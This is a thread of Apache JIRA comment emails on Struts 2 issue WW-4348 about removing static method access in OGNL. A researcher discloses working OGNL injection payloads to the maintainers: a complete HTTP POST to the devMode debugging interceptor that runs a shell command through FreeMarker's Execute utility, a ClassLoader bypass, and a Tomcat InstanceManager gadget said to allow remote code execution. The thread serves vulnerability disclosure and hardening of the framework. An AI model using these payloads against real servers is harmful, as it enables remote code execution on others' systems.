[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16758069#comment-16758069 ] Lukasz Lenart commented on WW-4348: --- I meant, you cannot use {{#application}} in a http request. You can use this value only inside your code (in JSPs) > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16751496#comment-16751496 ] Markus Wulftange commented on WW-4348: -- What do you mean by it gets blocked from outside? I have used the debugger in devMode like last time and it works that way. > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16748526#comment-16748526 ] Lukasz Lenart commented on WW-4348: --- Yeah, but we block access to {{#application}} from outside > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16747199#comment-16747199 ] Markus Wulftange commented on WW-4348: -- Hi [~lukaszlenart], _freemarker.Configuration_ is no longer accessible and so are _Class_ instances. So the mentioned examples won't work any more. But, at least with Tomcat, there is {noformat} #application["org.apache.tomcat.InstanceManager"].newInstance("…"){noformat} which can create arbitrary objects via the public argument-less constructor. There are multiple classes that allow RCE that way. > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16744994#comment-16744994 ] Lukasz Lenart commented on WW-4348: --- [~mwulftange] could you check with the latest 2.5.20 Struts version? > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15816378#comment-15816378 ] Markus Wulftange commented on WW-4348: -- Here is also a _ClassLoader_ bypass: {noformat} #application['freemarker.Configuration']['newBuiltinClassResolver'].resolve('freemarker.template.Template',null,null) {noformat} > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15816136#comment-15816136 ] Markus Wulftange commented on WW-4348: -- Well, it works with the latest 2.5.8. > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15815957#comment-15815957 ] Lukasz Lenart commented on WW-4348: --- [~mwulftange] but this doesn't work since Struts 2.3.20 as the new Internal Security Mechanism blocks access to particular classes, in this case to {{ClassLoader}} http://struts.apache.org/docs/security.html#Security-Internalsecuritymechanism > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15809959#comment-15809959 ] Markus Wulftange commented on WW-4348: -- No, this can be specified where ever OGNL expressions are evaluated. For example, [via the DebuggingInterceptor|http://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/]: {noformat} POST /blank-1.0.0/example/HelloWorld.action HTTP/1.1 Host: 127.0.0.1:8080 Content-Type: application/x-www-form-urlencoded Content-Length: 670 debug=command=%23application["freemarker.Configuration"]["objectWrapper"].newInstance( %23context["com.opensymphony.xwork2.dispatcher.ServletContext"].classLoader.loadClass("freemarker.template.Template"), { %23application["freemarker.Configuration"]["objectWrapper"].wrap(""), %23application["freemarker.Configuration"]["objectWrapper"].wrap("<%23assign+ex%3d\"freemarker.template.utility.Execute\"%3fnew()>${ex(\"xterm\")}"), %23application["freemarker.Configuration"]["objectWrapper"].wrap(%23application["freemarker.Configuration"]) } ).process( null, %23context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].getWriter() ) {noformat} By the way, the given OGNL expression is equivalent to the following standalone code: {noformat} new Template( "", "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"xterm\")}", Configuration.getDefaultConfiguration() ).process( null, new PrintWriter(System.out) ); {noformat} > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15809899#comment-15809899 ] Lukasz Lenart commented on WW-4348: --- [~mwulftange] but as far I understand this must be defined as a template by developer on server side? > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15801069#comment-15801069 ] Markus Wulftange commented on WW-4348: -- Disallowing static methods isn't sufficient. With access to FreeMarker's _BeansWrapper_ instance, it is still possible to create an instance of any class. For example, by creating a FreeMarker _Template_ instance which utilizes the _Execute_ utility, it is still possible to execute arbitrary commands: {noformat} #application["freemarker.Configuration"]["objectWrapper"].newInstance( #context["com.opensymphony.xwork2.dispatcher.ServletContext"].classLoader.loadClass("freemarker.template.Template"), { #application["freemarker.Configuration"]["objectWrapper"].wrap(""), #application["freemarker.Configuration"]["objectWrapper"].wrap("<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"xterm\")}"), #application["freemarker.Configuration"]["objectWrapper"].wrap(#application["freemarker.Configuration"]) } ).process( null, #context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].getWriter() ) {noformat} > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15711283#comment-15711283 ] Lukasz Lenart commented on WW-4348: --- It's here to remind us about pass vulnerabilities around this functionality. And there is always a chance that we won't be able to fix them and the only option will be dropping it :( As for now we were good at solving the vulnerabilities and now it's safe to use it :) > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15711251#comment-15711251 ] Michael Krause commented on WW-4348: Oh good, that is very reassuring. Maybe you can set the resolution to something like 'Not a problem'? > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15709166#comment-15709166 ] Lukasz Lenart commented on WW-4348: --- Yeah.. we know that, that's why it hangs here ;-) > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15709039#comment-15709039 ] Michael Krause commented on WW-4348: Please do not 'fix' this 'bug'. Access to static methods is used in long-living enterprise applications all over the place. You will create a lot of work if you remove this feature. > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5.x > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15091051#comment-15091051 ] Lukasz Lenart commented on WW-4348: --- Nope, by defining {code:xml} {code} you'll enable access to static methods, setting {{false}} it'll be disabled. But access to static methods was very often use as a hacker's attack vector on users' applications. See PoC here http://struts.apache.org/docs/s2-009.html > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5 > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15091046#comment-15091046 ] victorsosa commented on WW-4348: So can I just add Into the config file so it start running the check?? > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5 > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15091016#comment-15091016 ] victorsosa commented on WW-4348: This is already implemented, please check com.opensymphony.xwork2.ognl.OgnlUtil.setAllowStaticMethodAccess(String) you only need to set "struts.ognl.allowStaticMethodAccess" true > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5 > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15091053#comment-15091053 ] victorsosa commented on WW-4348: OK so it need to be false > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5 > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)
[jira] [Commented] (WW-4348) Remove access to static methods
[ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15091045#comment-15091045 ] Lukasz Lenart commented on WW-4348: --- Yes, the idea is to drop such functionality because it's a source of many security vulnerabilities. > Remove access to static methods > --- > > Key: WW-4348 > URL: https://issues.apache.org/jira/browse/WW-4348 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.16.3 >Reporter: Lukasz Lenart >Priority: Critical > Fix For: 2.5 > > -- This message was sent by Atlassian JIRA (v6.3.4#6332)